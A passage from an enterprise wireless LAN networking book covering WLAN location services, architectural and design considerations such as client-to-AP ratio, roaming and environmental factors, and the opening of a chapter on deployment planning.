or client device. This allows the WLAN location service to calculate the general area using
triangulation algorithms. RF triangulation does not take into account environmental factors, such as
interference, multipath, and signal attenuation. As such, RF triangulation results can be rendered
inaccurate due to these adverse environmental effects.
RF fingerprinting This method uses a record of the radio signature of the entire area that is
monitored. Effectively, the "fingerprint" of each location (usually on a grid basis) is compared to
real-world data transmitted by the tag. By comparing both, the WLAN location system can quite
accurately determine the tag or client's location. For example, RF fingerprinting can incorporate a
building map that includes the known propagation effects of the building topography such as
attenuation from walls or furniture. Knowing these propagation effects, the WLAN location system
can more accurately determine the tag or client's location.
Location services are computationally intensive, especially when real-time information is required. As
more devices are tracked, the more difficult it becomes without dedicated resources. Although many
WLAN vendors offer location services, the more robust and scalable enterprise solutions rely on
dedicated servers or appliances to offload the CPU-intensive activity from the access points or WLAN
controllers.
WLAN Location Services Implementation Considerations

In addition to the type of location service you want to provide and how you want to support and
integrate it, you need to carefully consider privacy matters, tag battery life, and tag security when
implementing WLAN location services in your organization.
Privacy is a concern when tracking the location and historical movement of users. Inform the user when
utilizing WLAN location services in the enterprise to track wireless client devices such as laptops, user ID
tags, or WLAN phones.
Tag battery life for WLAN-based asset or location tags range from three to five years. Although this
might sound like a sufficient amount of time for most business applications, some thought should be put
into scalability and longevity of the system. The more accurate the real-time information you need, the
more often the tag must transmit its location. (This is a configurable option on most tags.) The more
often a tag transmits its location, the quicker it exhausts its battery. A careful compromise is thus
required. Ensure that you fine-tune the system to collect location information on a sufficiently regular
basis, without expending more battery life than necessary.
Tag security should be considered. When tags are used to track the location of valuable assets, it is
important that they are securely fixed and, if possible, hidden from view. Also make sure that the tag
can be removed when required.
Summary
In this chapter, you learned that supplementary services of voice and video can be layered onto WLANs.
Many of the benefits that these applications bring to wired environments are directly applicable in the
wireless environment. However, carefully consider the challenges of enabling VoIP and video on WLANs
and leverage QoS techniques to remedy some of the problems.
You learned about the implications of having to support voice on a diverse set of WLAN devices and
identified the importance of having a robust architecture and design. If your WLAN deployment contains
multiple ESSs, remain sensitive to the hurdles created by roaming clients. Chapter 5 covers these topics
in greater detail.
This chapter also covered the commonly encountered types of video traffic as well as the challenges that
are specific to implementing video in WLAN environments. You learned about the different distribution
mechanisms, timing of the distribution, and the ability to tune quality to deliver more consistent video
experiences. Keep in mind that a robust QoS foundation is critical but that it also does not resolve all
challenges imposed by multi-access media such as WLANs. Set the proper expectations with your users.
Guest WLANs and location services were the complementary services that this chapter introduced. Guest
WLANs support network access to nonemployees by providing basic Internet connectivity to them. Use
dedicated guest SSIDs as well as IP tunneling protocols to move traffic to and from the Internet in an
isolated and secure manner.
Finally, WLAN location services were introduced as a practical method for providing telemetry
information on WLAN client devices. The value of LBS-enabled tracking, information, and security and
safety services was discussed, and examples were provided of how various industries make use of this
solution.
The proper mix and implementation of these supplementary and complementary services will extend the
success and value of your WLAN for your company. Part II of the book focuses on the specifics of how to
architect and design an enterprise class wireless LAN, what the recommended practices are for
deploying and managing it, and how to construct and implement a security framework for the WLAN.
Additional Resources
Cisco Systems, Inc. "IP Videoconferencing Solution Reference Network Design (SRND)."
http://www.cisco.com/application/pdf/en/us/guest/netsol/ns280/c649/ccmigration_09186a00800d67f6.pdf
. 2002.
Cisco Systems, Inc. "Cisco Gigabit-Ethernet Optimized IPTV/Video over Broadband Solution Design and Implemen
http://www.cisco.com/en/US/partner/netsol/ns340/ns394/ns158/ns88/networking_solutions_design_guide_book0
. 2005. (Requires Cisco.com registration.)
Davidson, Jonathan, J. Peters, and B. Gracely. Voice over IP Fundamentals . Cisco Press 2000.
Durkin, James F. Voice-Enabling the Data Network . Cisco Press 2002.
Hattingh, Christina, and T. Szigeti. End-to-End QoS Network Design: Quality of Service in LANs, WANs,
and VPNs . Cisco Press 2004.
Chapter 5. Guidelines for A Successful

Architecture and Design
Part I of this book introduced WLAN technology and familiarized you with its key technical aspects. You
learned about the different types of business considerations you need to make to identify, qualify, and
quantify the value that WLANs can bring to your organization. You also learned about recommended
strategies and practices when initiating the PPDIOO lifecycle of your WLAN. Planning and preparation
focused on providing a structured approach for your deployment and highlighted areas that require
preparatory work because you need to identify management and technical dependencies that are unique
to your circumstances.
As you move through the various lifecycle stages, your focus shifts from strategic to tactical matters.
Chapter 2, "Business Considerations," and Chapter 3, "Preparation and Planning" focus on the strategic
aspects of setting up your WLAN. Part II of the book covers the next phases of the PPDIOO lifecycle. You
learn about architecture, design, implementation, and operations relating to your WLAN.
The difference between architecture and design can be rather vague; however, as a rule of thumb,
consider the difference as similar to that between strategic and tactical matters. In both cases, the
former is concerned with where to go, whereas the latter is focused on how to actually get there. This
chapter covers the strategic aspects of defining your WLAN architecture and takes a look at the tactical
design considerations that are specific to WLANs.
This chapter introduces the notion of architecture and provides recommendations for developing a
holistic framework that can guide the engineering effort of designing, implementing, and operating the
WLAN. You learn about the key components of an effective architecture and identify the balance that
must be struck between detail, complexity, and usefulness.
The WLAN design provides the necessary detail on how the solution must be built, integrated, and
configured. Because many of the design considerations are identical for wired and wireless networks,
this chapter focuses on those considerations that are unique to WLANs. These include the ratio of users
to access points, also known as the client-to-AP ratio, the impact of roaming from cell to cell, and the
physical placement of the access points.
Finally, this chapter highlights the environmental considerations that are essential for defining a WLAN
architecture and design. You learn details about the impact of the physical environment, nearby radio
signals, and local governmental regulations and explore the recommended practices for managing these
challenges.
Architectural Considerations
Architecture is a framework of components, concepts, and practices that acts as a guide for an
underlying design. A robust architecture ensures that the actual WLAN solution meets the predetermined
goal for the organization while providing sufficient flexibility to manage the various engineering and
operational tradeoffs that WLAN technology requires. As such, it is important that the architecture act
only as a guide or baseline and not as a blueprint. This section provides recommendations for setting
realistic expectations and guidelines when defining your WLAN's architecture.
WLAN Expectations
The definition of your WLAN architecture should begin with identifying and scoping your expectations
and goals. A clear understanding of the business needs for WLANs will simplify alignment between
technology solutions and business requirements, and will facilitate the definition of a relevant and
specific WLAN architecture. The successful WLAN architecture, therefore, relies on the business
considerations, as discussed in Chapter 2, and the provisioning strategy, as outlined in Chapter 3.
When you define your WLAN architecture, focus on two distinct technology alignment challenges:
Alignment with business requirements
Alignment with user requirements
To support the business, the WLAN architecture should facilitate and support the generation of a net
positive value in the form of strategic, operational, or technological benefits. To effectively support the
user, the architecture needs to take into account parameters such as usability, convenience, access,
availability, and support. If the WLAN is not easy to use, is subject to poor coverage or uptime, or has
little user support, the total WLAN experience will not be positive, resulting in little or no use of the
infrastructure investment.
Key Components for an Effective WLAN Architecture

WLANs are justified by benefits such as providing mobility to the workforce, reducing the cost of
infrastructure for sporadically used locations, and increasing productivity by keeping mobile users
connected. As highlighted in Chapter 2, the business case for WLANs relies on your ability to identify the
organizational benefits that WLANs can enable. Identifying which services and applications the WLAN
must support is key to building a robust, relevant, and sustainable architecture.
Without a thorough understanding of what is demanded from the wireless communications
infrastructure, there is a high probability that you will either undershoot or overshoot supply. Your WLAN
architecture thus becomes the vehicle that guides and ensures proper alignment between infrastructure
demand and supply. The key components for the step-by-step development of a successful WLAN
architecture are
Determining the goal of the WLAN
Defining the scope of your WLAN
Developing your timeframe to deploy
Considering IT security requirements
Identifying the types of users and devices you want to support
Establishing an operational support structure and process
The following sections describe each of these considerations in more detail.
Determining the Goal of the WLAN

Because of increased adoption, more applications and services are being layered onto the WLAN.
However, the number of applications utilizing wireless transport is not the only factor that is changing.
The characteristics of the applications themselves are changing as well.
Traditionally, WLANs in enterprises were intended only for data traffic. The key applications were typical
business productivity tools such as e-mail, web browsers, calendaring tools, and messaging. These
applications produce network traffic that is irregular and noncontinuous. Periods with high network
utilization are followed by periods of low network utilization, and the duration of both these periods is
unpredictable. The applications are considered "bursty" as they load the network in bursts.
As WLANs became more prevalent, they started to become the preferred means of network connectivity.
This resulted in bandwidth-intensive and potentially latency-sensitive applications such as video also
migrating onto the wireless medium. The challenge created by these applications is that they demanded
a different type of service by the network. Best-effort service became insufficient as these applications
required high throughout and deterministic behavior.
A common issue with networked applications is that they are developed with little or no consideration for
the resources they require from the communications infrastructure. Application developers take into
consideration the notion of the network but typically fail to consider bandwidth and latency implications.
The (false) assumption is that the network is always available, that bandwidth is unlimited, and that
congestion and delays do not occur. As such, even though the applications and the network are tightly
coupled, they are typically developed and deployed as independent components.
It is exactly this decoupling that creates the burden of carefully planning your WLAN if you want to
successfully support the extension of your applications to the wireless environment. Hence, you should
start with the premise that the average application is not aware of the transport medium it is using. They
treat the networkwired or wirelessidentically.
The challenge of applications not being aware of the network is compounded with WLANs. Indeed, most
applications are developed for the wired environment. Specific characteristics of WLANs are their lower
throughput and higher latency than their wired equivalents. This is typically not a problem for the bursty
applications. However, WLANs can cause additional challenges for applications that demand high data
rates or deterministic behavior.
The interaction between applications and the network is only one of the challenges that must be tackled
when defining a WLAN architecture. Defining a wireless architecture to support voice and video also
introduces specific problems that must be considered. The considerations include provisioning sufficient
bandwidth for latency-sensitive voice and video streams, implementing a quality of service (QoS)
solution, and ensuring fast roaming capabilities between cells. Refer to Chapter 4, "Supplementary and
Complementary Services," for additional details on supporting voice and video in WLAN environments.
Defining the Scope of Your WLAN

The scope or footprint of your WLAN deployment is one characteristic that you can easily define from the
start. However you define itsmall, limited, partial, full-scale, or ubiquitousthere is a boundary to which
you can adhere. Although the scope of your WLAN deployment has a larger impact on the planning and
implementation phases, it also plays a role in the architecture.
The architecture must formalize and document the coverage your WLAN provides. The formalization of
the scope serves as a guide to ensure that you neither underengineer nor overengineer your WLAN
solution. Underengineering occurs when you provide insufficient resources to provide the intended
degree of service. Examples include inadequate coverage due to not deploying enough access points or
failing to incorporate the proper IT security standards for your organization.
Overengineering is the inverse case. This happens when more resources are supplied than are strictly
needed to implement your desired solution. In this scenario, you will have squandered both time and
money. An example of overengineering is deploying too many access points. In this case, you could
either be overlapping coverage of access points or providing coverage in areas where there is no need
for WLANs.
A key consideration when determining the scope of your WLAN is how you intend to provide operational
support. Today, enterprises that extend their global reach must deal with an increased number of
operational issues. Examples include selecting a scalable strategy and platform for managing the WLANs
RF spectrum as well as potentially hundreds of access points and thousands of client devices.
Leverage the scope as defined in the WLAN architecture as a planning tool. This structured approach
makes it easier to determine how you offer support at the different levels of the fault resolution path,
and how you plan to handle onsite resources for troubleshooting. Refer to Chapter 8, "Management
Strategies for Wireless LANs," for operational considerations and recommendations.
Developing Your Timeframe to Deploy

The next step is to develop a timeframe for deployment. In this case, time refers not only to the time
when you begin a deployment, but also to the time it takes to complete the deployment. The proper mix
of time, as it relates to the preparation, planning, design and implementation, is fundamental. Two
aspects of time concern WLAN architecture and design:
Making timely decisions
Implementing the decisions before they outdate themselves
Wireless data networking is no longer a budding technology. It has built up momentum to a point where
aspects of the technology are quickly superseded by more advanced features and functions. Figure 5-1
illustrates that as the time to deploy becomes extended, the probability that technology features will
make a significant jump becomes greater.
Figure 5-1. Deployment Versus Technology Evolution
To manage the time it takes to deploy, adopt the following practices when defining the architecture:
Stay familiar with developments in WLAN technology Set a goal of staying abreast of
standards to ensure that the technology does not date itself. Establish a frequency and process that
evaluates the market, and build a matrix to align the technology with the overall business direction.
Break up requirements into sections By segmenting your business needs, you can align your
technology solutions more easily and efficiently. Build a roadmap of the follow-on technologies that
can be adopted without requiring a major change in the architecture.
Remind yourself that the architecture is only a framework The architecture should not
become so detailed that it impedes the growth of the network. Maintain standards but avoid
defining specific engineering details in your WLAN architecture.
Considering IT Security Requirements

Many enterprises were reluctant to adopt wireless LANs because of the perceived security concerns. The
main causes for worry lay in the unbound and uncontrolled nature of the RF transport medium.
However, many tools and solutions have been developed that allow you to build a WLAN that is at least
as secure as its wired counterpart.
The WLAN architecture plays a key role in securing your WLAN because it explicitly identifies which
components must be incorporated as well as their interdependent relationships. The architecture thus
effectively defines the security chain, the policies that must be adhered to, and the procedures that must
be followed to secure your WLAN.
Because each WLAN component contributes in either a constructive or destructive way to the robustness
of the security solution, you must first identify each of these components. Examples of the components
include the following:
Passwords
Authentication and access methodology
Encryption and hashing standards
Devices and their respective operating systems
Note
Robust passwords form the foundation of security because they are used to unlock the gate to
the system. They should be sufficiently strong to prevent easy guessing or hacking.
Exhaustive, brute-force methods can uncover all but one-time passwords, therefore, the
strategy for common passwords is to make discovery as challenging as possible. Require the
use of both uppercase and lowercase alphanumeric characters in addition to special characters.
Furthermore, the more characters you use in a password, the stronger it becomes. You should
use no less than a 10-character password. Two examples of robust passwords are Ci$cOPr3##
(Cisco Press) and G@W1re!3zz (Go Wireless).
Next, the WLAN architecture must define how all the components are interrelated. This process not only
ensures that there are no gaps in the security chain, but also that weaker links can be strengthened or
more actively managed to provide a holistic and robust security posture. Clearly define the
authentication and access methodology, the selected encryption standard, and key management
policies.
The security policy and procedures that you define in your WLAN architecture must then be applied in
the design, implementation, and operation stages of your WLAN's lifecycle to ensure that security
considerations are not only included but also overarching. Chapter 7, "Security and Wireless LANs,"
details solutions and recommendations for tackling the challenge of constructing a secure WLAN.
Identifying the Types of Users and Devices You Want to Support

An important architectural consideration is the target audience. This aspect of the WLAN architecture is
directly related to the people or devices and how they use the WLAN. Every usage profile has its own
distinct set of considerations that needs to be included in the architecture. To simplify the challenge of
incorporating user and device considerations in your WLAN architecture, start by segmenting the WLAN
user-community by identifying common usage profiles.
The concept of user classes was introduced in Chapter 3. Classifying users allows you to determine the
degree of relevance of WLANs for subsets of the user community. Classification is performed by
grouping users who share common attributes. These profiles are based on the users' characteristic
requirements that include their primary applications, degree of mobility, bandwidth and latency
restrictions, level of security, and typical hours of operation.
Chapter 3 uses the segmentation in function of mobility needs to define the different user classes. The
classes are named standard, mobile, roaming, hot-desk, and guest. You can opt to use the
aforementioned classes, or you could, for example, simplify classification into three classes:
Highly mobile
Partially mobile
Nonmobile
Your WLAN architecture must not only identify the different user classes, but also specifically formalize
how the WLAN will support each of the respective classes. Figure 5-2 shows an example of a breakout of
users in function of mobility needs. A sample of job roles has been added for illustration. Note that this
is an illustration only and by no means definitive. For example, a factory worker might need no mobility
in one type of role (manufacturing) but require high mobility in another role (warehouse management).
Figure 5-2. Users by Type and Class
In addition to the WLAN user considerations, the architecture needs to identify which devices can or
must be supported. When thinking about devices, focus on physical attributes. These include tethering,
battery life, interoperability, computational horsepower, durability, and control on placement.
For example, clients might be intelligent and mobile such as laptop computers, or dumb and fixed as, for
instance, printers and cameras. Handheld scanners can be used for a finite amount of time before their
batteries run out. Finally, the placement of PDAs is hard to control, creating potential security hazards.
Different devices have capabilities and limitations that, if supported correctly, ensure performance at the
desired expectations. The architecture must frame which devices will be supported by the WLAN and
provide guidelines regarding their expected performance, potential pitfalls that are unique to the wireless
environment, and problem mitigation strategies.
Plan for the use of devices of different manufacture. Although standards exist, each device is certain to
carry its own inherent features, which can result in future compatibility challenges. In the enterprise,
where enforcement of standards can be more readily managed, it might be easy to control such issues,
however, there are instances where this is not the case. A prime example is a university deployment. In
providing access to its student body, a university needs to support a broad assortment of end devices,
operating systems, and client software.
Have your WLAN architecture provide a framework and guideline for how you will support your
heterogeneous client base in a comprehensive and structured manner. Explicitly define the different user
classes and their respective application characteristics and include details on how the specific devices will
be supported.
Establishing an Operational Support Structure and Process

You manage the WLAN through provisioning and operational control. Provisioning is the management of
systems or devices by sending configurations down to them. You can do this actively or passively. Active
provisioning is a repeat process, such as a nightly download. Passive provisioning is performed only
when a change is required.
Operational control is the traditional network management whereby systems and devices are monitored.
Reactive operational control is performed by waiting for an event or alert and then acting upon it.
Proactive operational control is performed by examining data for trends or capturing signs of trouble
before an event occurs.
Given the importance of post-deployment support, your WLAN architecture should explicitly define
expectations and baseline standards for the WLAN's operational support structure. This should be the
case irrespective of the actual management strategy you already have or want to put in place. Strike a
careful balance between customization, complexity, and value because too much customization will likely
yield diminishing returns. Refer to Chapter 8 for more details on recommended operational practices.
Design Considerations
The previous section provided guidelines for defining the overarching architecture for your WLAN. The
framework formalizes the goal, scope, supported device types, and lifecycle management strategy for
your WLAN. More specifically, the architecture defines the strategy for the WLAN's security posture and
practices, as well as the WLAN's implementation and operational support structure. The architecture
does not, however, address detailed design considerations.
The WLAN design provides the necessary detail on how the solution must be built, integrated, and
configured. As such, the design of your WLAN specify specify network topologies, how many access
points you need to deploy, their make and model, specific AP configurations, where and how you will
connect the WLAN to the rest of the network, IP addressing schemes, QoS parameters, access point
management passwords, and so on. In short, the design is focused on the physical layout and
configuration of the WLAN.
Many of the decisions that must be made during the design of wired networks are directly applicable in
the wireless environment. However, there are also distinct considerations that are unique to WLANs,
including the following:
The ratio of users to access points, also known as the client-to-AP ratio
The impact of roaming from cell to cell
The physical placement of the access points
This section focuses on the design decisions that need to be made regarding the client-to-AP ratio and
roaming capabilities. Chapter 6, "Wireless LAN Deployment Considerations," provides guidelines for
identifying the appropriate physical placement of the access points during the implementation of the
WLAN.
Client-to-AP Ratio
Many different factors impact the performance of your WLAN. Internal aspects include the shared nature
of the communication medium, the access mechanism for the medium, the use of a limited number of
communications channels, and the available bandwidth. External factors consist of the number of users,
the types of devices communicating across the WLAN, the types of applications used on the network and
the degree of mobility that is demanded by the user community.
As outlined earlier in the section "Identifying the Types of Users and Devices You Want to Support,"
knowing the traffic types and usage patterns on the WLAN is fundamental to designing a solution that
not only performs correctly, but also delivers a relatively consistent level of service. As such, providing
the WLAN with the proper number of access points is probably the single most contributing factor to
creating a WLAN that meets a performance baseline.
The industry has converged on the metric "client-to-access point ratio" to denote the number of users a
single access point can consistently support; however, do not take the term "client" at face value.
Indeed, a student that uses the WLAN primarily for e-mail and web browsing will have different
bandwidth requirements than an engineer using the WLAN mainly for streaming video and computeraided design (CAD) applications. As such, carefully consider the types of clients and their respective
network needs.
Note
The client-to-AP ratio is expressed as a number such as 10:1. In this case, the number 10
represents the recommended maximum number of clients that can be associated to an AP at
any given time. Exceeding this ratio will degrade the expected performance.
Three different strategies can be used to determine what the correct client-toAP ratio is for your
environment. You can perform benchmark tests to identify exactly what works, you can classify users
and traffic types as in Table 5-1 to generate more granular client-to-AP ratio specifications, or you can
simply adopt client-to-AP ratio guidelines that have been published by most vendors. Each strategy has
its merits and drawbacks.
Benchmarking enables the most precise identification of the client-to-AP ratio. Local variations are
measured and the ratio can be optimized depending on the exact user profiles and needs. However, not
only is this approach time and resource intensive, but it also creates a dated snapshot. If the
environment changes, for example, and the HR and engineering departments introduce new software
with different traffic signatures, the benchmarks will no longer be accurate.
By classifying both traffic and users, as detailed in Chapter 3, some degree of customization can be
captured. The process is relatively straightforward and can be performed by your network architects and
designers. A challenge that you will likely face with this method is the identification of the correct
segmentation of the users and traffic types. Don't reinvent the wheel. Follow the classification guidelines
as set forth in your architecture. Given the benefits of more accurately identifying a client-to-AP ratio
that yields a more consistent and satisfactory WLAN user experience, we recommend that you adopt this
approach.
The final strategy is to accept the recommended client-to-AP ratio as published by the WLAN equipment
vendor. Even though this is the easiest solution, there is potential for over- or underprovisioning the
number of access points because the information provided by the vendor does not consider your specific
user-base requirements. However, use the WLAN vendor's published recommendations as a sanity
check.
Roaming
Roaming occurs when a device moves its association from one access point to another. By moving the
association, the device has effectively traversed the basic service set (BSS) boundary and moved into a
new one. However, roaming is not limited to crossing BSS boundaries.
As mentioned in Chapter 1, "Introduction to Wireless LAN Technologies," the BSS is equivalent to a
Layer 2 network. Multiple BSSs can be grouped together into an extended service set (ESS), which
equates to a Layer 3 network. As such, changing the association from one access point to another can
not only cause the client to roam across BSS boundaries, but also ESS boundaries.
Authentication is not the only area that is affected when a user moves its association from one access
point to another. Roaming across BSS boundaries creates the following three challenges:
Authentication
Performance
ESS boundaries
Each vendor offers its own solution for these challenges, and each solution has its own strengths and
weaknesses. In the end, it is important to understand the impact of roaming. The following sections take
a closer look at the challenges that are created by roaming and provide recommendations for addressing
them.
Authentication
If you opt to use authentication to secure your WLAN, switching association from one AP to another
triggers a re-authentication process. The new AP does not know that the client is permitted to associate
and, therefore, the client must go through the entire authentication process. As the number of times a
station roams and the number of stations roaming increases, latency can be introduced due to the
authentication traffic and the authentication processing overhead that is handled by the AP.
Note that authentication does not occur only when a client roams. To increase the robustness of WLAN
security, it is not uncommon that authenticated credentials expire after a certain amount of time. When
this occurs, the station is forced to re-authenticate. In this scenario, a station authenticates multiple
times over the duration of its association with the same access point even though it is not physically
roaming.
Some WLAN products provide methods to reduce the number of authentication requests that are sent to
the authentication, authorization, and accounting (AAA) infrastructure. This process is often known as
fast roaming, because the authenticated status of the client is stored locally in the access point or
controller, thereby avoiding the need to contact the back-end AAA server directly. This reduces the time
for authentication (hence "fast roaming") and the load on the AAA servers themselves.
Performance
Performance is not limited to the throughput that a client can achieve. It is also directly related to the
client keeping its network connection and communication session intact. When roaming, there is a small
amount of time during either authentication or association during which the client will effectively be
without a link. The duration of the lost link will determine if and how applications will be impacted. Note
that last roaming was specifically conceived to make this link loss during authentication almost
unnoticeable to end users.
Applications exhibit a distinctive sensitivity to the duration of a lost link. Transactional applications such
as e-mail and web browsing are relatively insensitive, whereas real-time applications such as voice and
video are highly sensitive. Ensure that you enable fast roaming to make authentication occur promptly
enough to not affect the core WLAN application suite.
ESS Boundaries
As mentioned earlier, roaming occurs when a station moves its association from one access point to
another. This effectively makes the station jump from one BSS cell into the next. As long as the client
remains in the same ESS, its IP address remains valid and the Layer 3 session can be maintained.
If, however, the station crosses an ESS boundary, it effectively moves into a different Layer 3 network.
The IP address that was assigned for the old ESS is invalid, and all active IP sessions terminate as traffic
directed toward the station is incorrectly routed. To remediate this routing problem, the client must
release its old IP address and request a new one for the subnet that it now finds itself in.
To keep the IP sessions alive, some mechanism is needed to transfer the active connections. A method
of achieving this is by empolying Mobile IP, which is an open protocol that comes in different forms but
allows clients to move between Layer 3 networks or subnets. However, keep in mind that Mobile IP is no
longer the primary mobility method for most vendors. Because it requires client software, it is currently
used only in "extreme" roaming situations like those found in moving vehicles with multiple available
network types. Most vendors today use some kind of tunneling technology to hide the fact that the user
has crossed a Layer 3 network boundary. This tunneling solution is similar to that used for remote VPN
access. In essence, a logical overlay of multiple ESSs is instantiated by means of the tunnels, thus
enabling roaming without Layer 3 hazards.
If you do not opt to implement solutions that provide Layer 3 roaming capabilities, carefully plan the
layout of your WLAN subnets to address this challenge. Avoid creating multiple ESSs in areas where
users typically roam. For example, because users typically move around on a floor, create a single ESS
per floor. However, a floor-by-floor model can have problems in certain buildings where there is strong
signal propagation between floors. In these types of buildings, users can accidentally roam between
floors, creating the problems previously described. Carefully measure signal strength on each floor and
fine-tune the radio's signal power to avoid it propagating between floors.
Also, consider recommended practices for sizing IP subnets. Subnets that are too large can experience
performance issues because of excessive IP broadcast traffic. Adopt the recommended IP addressing
practices when designing your WLAN. Plan carefully and strike a balance.
The environmentbe it a building, country, or climatein which the WLAN operates plays a critical role in
defining the architecture and design of WLANs. Chapter 1 introduced the various environmental factors
that have an impact on the performance of the WLAN. Examples included the attenuation and distortion
of radio signals by various materials and the multipath effect.
The architecture should account for the variables of the environment without actually providing specific
details on remediation methods. The design, however, must include specifications on how the WLAN will
accommodate local variations.
When defining your WLANs architecture and design, you need to consider the following three
environmental matters:
Physical attributes of the surroundings
RF environment
Local governmental regulations
The following sections describe each point in detail.
Physical Attributes of the Surroundings

Physical attributes of the surroundings include both the placement and type of obstacles in open spaces.
The obstacles are any foreign objects that the propagating RF signals encounter. The objects can be
static, such as furniture, walls, warehouses, and buildings, or dynamic like cars, forklifts, and even
people.
The exact type or movement of the obstacle is not important. What is important is that all matter affects
the radio signal by modifying the profile and strength of the original signal, which is known as distortion
and attenuation, respectively. As the signal's quality and strength decreases, the receiving stations have
a harder time reconstructing the original message, and this is accompanied by a reduction in
throughput.
Include considerations about the physical environment in your architecture by defining what the
minimum acceptable signal quality and strength should be because they determine which throughput
your WLAN can sustain. For example, requirements for a signal that must consistently support 54 Mbps
throughput will be a lot more stringent than an environment where throughput can throttle between 54
Mbps and 11 Mbps. These guidelines should then be used for the design of the WLAN to determine how
many access points are required and where they should be placed.
RF Environment
Physical obstacles are not the only kind of entities that can impact the strength and quality of an RF
signal. Other RF signals that are in the vicinity interfere with the original signal and modify its profile.
Whereas the visible concerns can be managed in a straightforward manner, the invisible cannot. Even in
controlled deployments, you can expect to contend with other nearby WLAN deployments. Furthermore,
devices like wireless phones, microwaves, handheld radios, and Bluetooth devices will have some impact
on RF signal quality because (in most cases) they share the same RF space.
The best way to combat the challenge of interference is to carefully and purposely design your WLAN
cells. Fix the throughput rate of your cells. Building your WLAN with well-defined cells aids in the control
and troubleshooting of these unknowns. An additional benefit of carefully controlling the footprint of the
radio cells is a higher degree of security. Chapter 7 covers the security considerations in more detail.
WLAN protocols are designed to throttle throughput in function of the strength and quality of the signal.
As the footprint of the cell is related to the throughput, varying rates result in changing cell sizes. For
example, in 802.11b, cells that are fixed at 11 Mbps are significantly smaller than those that are fixed at
2 Mbps. Pegging the throughput rate creates a fixed cell-size that is an easier to use building block for
designing your WLAN. The ability to design the network with standard and well-known parameters also
makes it easier to set the expectations of the user and troubleshoot the WLAN.
Local Governmental Regulations

One of the most overlooked aspects of WLANs in the global enterprise is the different regulations and
limitations that are imposed on WLANs and, specifically, the RF spectrum in which they operate.
Regulations surrounding RF are managed by both national and regional bodies, and significant disparities
can exist between respective local regulations. Be aware of potential differences in RF regulations and
know which regulatory bodies are relevant in your specific case and where to consult upon them. Include
both the regulatory requirements and the correct local solutions in both your architecture and design.
Summary
This chapter discussed the key architectural, design, and environmental considerations that are required
for WLANs. It emphasized the need for the architecture to be a framework as opposed to a blueprint,
thus providing flexibility for the designer. You learned about guidelines and recommended practices for
defining a robust WLAN architecture, including the following:
Determining the goal of the WLAN
Defining the scope of your WLAN
Developing your timeframe to deploy
Considering security requirements and implications early
Identifying the types of devices you want to support
Establishing an operational support structure and process
Adopting a financially responsible and conservative position
Confirming the staffing model for building and maintaining the WLAN
This chapter also discussed the most important design considerations that are specific to WLANs. The
need and methods for determining the correct client-to-AP ratio were covered as well as the challenges
that are created by roaming of stations.
Finally, the environmental considerations that are essential for defining a WLAN architecture and design
were highlighted. The impact of the physical environment, nearby radio signals, and local governmental
regulations was looked at in addition to recommended practices for managing these challenges.
Chapter 6. Wireless LAN Deployment

Considerations
Deploying an enterprise-class WLAN is a complex and lengthy process that requires you to deal with
many interdependent factors. Chapter 3, "Preparation and Planning," introduced the prepare, plan,
design, implement, operate, and optimize (PPDIOO) solutions lifecycle. Using this model, the
deployment of an enterprise-class wireless network falls under the implement phase of the lifecycle, as
shown in Figure 6-1.
Figure 6-1. Implementation Phase
During the implementation phase, the architecture and technical design you have defined is deployed
into your production environment. Many of the questions and issues raised in earlier chapters will now
have a direct impact upon your deployment plans. Topics such as the breadth and scope of your
deployment may dictate how you actually deploy and implement your solution.
Although there are no hard and fast rules for deploying enterprise-class WLANs, this chapter provides
some real-world, tried and tested strategies that have proven successful in large-scale deployments.
Deploying an enterprise-class WLAN is a complex and lengthy process. You must deal with many
interdependent factors. The following sections briefly discuss some of the high-level factors that you
must consider or address and summarize a proposed process in a WLAN deployment checklist.
In-House Deployment Versus Outsourced Deployment

One of the first decisions you must make before proceeding with a deployment is whether to use your
own internal IT resources or to outsource the deployment to a skilled and experienced vendor. In many
circumstances, and depending upon the scale of the deployment, you may end up doing a combination
of both. Some of the factors that may help you make this decision are listed in the next sections.
Internal Staff
Advantages to using internal staff for your deployment include the following:
It is potentially cheaper for small- to medium-sized deployments.
Your IT team can increase their wireless skills.
Your staff has end-to-end visibility and familiarity with the solution, as opposed to your team taking
ownership of a "fully baked" WLAN solution that was designed and deployed by third parties.
You avoid potential security concerns associated with engaging external vendors to work on your
enterprise network.
Conversely, utilizing limited internal resources also has several disadvantages. These include but are not
limited to the following:
Deployment may take longer due to resource constraints.
Your staff may make common mistakes and encounter challenges that an experienced solutions
provider would avoid.
Your IT department may not already have wireless skills and experience.
Your IT department may not have the required equipment on hand.
Your staff will have ongoing responsibilities and possibly other projects to complete.
Outsourced Resources
An alternative strategy to using internal resources is to retain outside help. Many large enterprises
choose to engage an outside vendor either for the complete deployment or to provide additional
resources for the implementation phase.
Some advantages of using external vendors include the following:
They will be wireless experts and potentially have certified wireless engineers.
The vendor may have national or international presence in locations to which your staff would
otherwise have to travel.
The vendor will have extensive experience, often with deployments very similar to yours.
They will not need as much time to "ramp up" and commence the installation.
They will usually provide dedicated project management capabilities.
The vendor can work to an agreed Service Level Agreement (SLA), often with penalty clauses for
project delays.
Following are several of the disadvantages:
The cost involved may be higher.
Introducing a third party into the deployment creates management and administrative overhead.
Permitting a third party access to your network might raise security concerns.
Of course, many of these disadvantages associated with using external resources, can be mitigated. For
example, additional cost of using external resources may be offset by the savings you make by utilizing
the vendor's local presence in a large national or international deployment. The time spent to develop
and increase the wireless skills of your internal staff may pay dividends later with improved
troubleshooting and technical abilities in-house. Security concerns with using external vendors for
sensitive network infrastructure projects can be mitigated or entirely addressed by careful management.
Carefully consider whether to use in-house or outsourced resources before you start. Many internally
resourced deployments have encountered problems only to resort to calling in assistance later, while
some outsourced projects have had costs spiral out of control. If you have tasked a program
management office (PMO) with the implementation of the WLAN, ensure that the PMO carefully monitors
and manages relationships with external vendors, and ensures smooth workflow between all
stakeholders and teams.
Architectural Milestones
Before proceeding with an actual deployment, there are some significant architectural milestones that
must be met first:
Solutions architecture
Bill of Materials
Security posture
Solutions Architecture
You must have a clearly defined architecture and a sound technical design before proceeding with your
implementation. This may seem like stating the obvious, but neglecting to clearly define and validate
fundamental architectural issues or specific technical designs is common. Do not attempt to learn as you
go because the project will lose focus, costs will spiral, and the likelihood of success will decrease
dramatically.
Chapter 5 describes the steps in defining a robust, scalable, and enterprise-class architecture in detail.
A Bill of Materials (BOM) is a comprehensive list of the equipment required for any project. One should
be produced to avoid delays before you commence the deployment. It is important that you estimate as
accurately as possible the specific infrastructure equipment you will require before the deployment
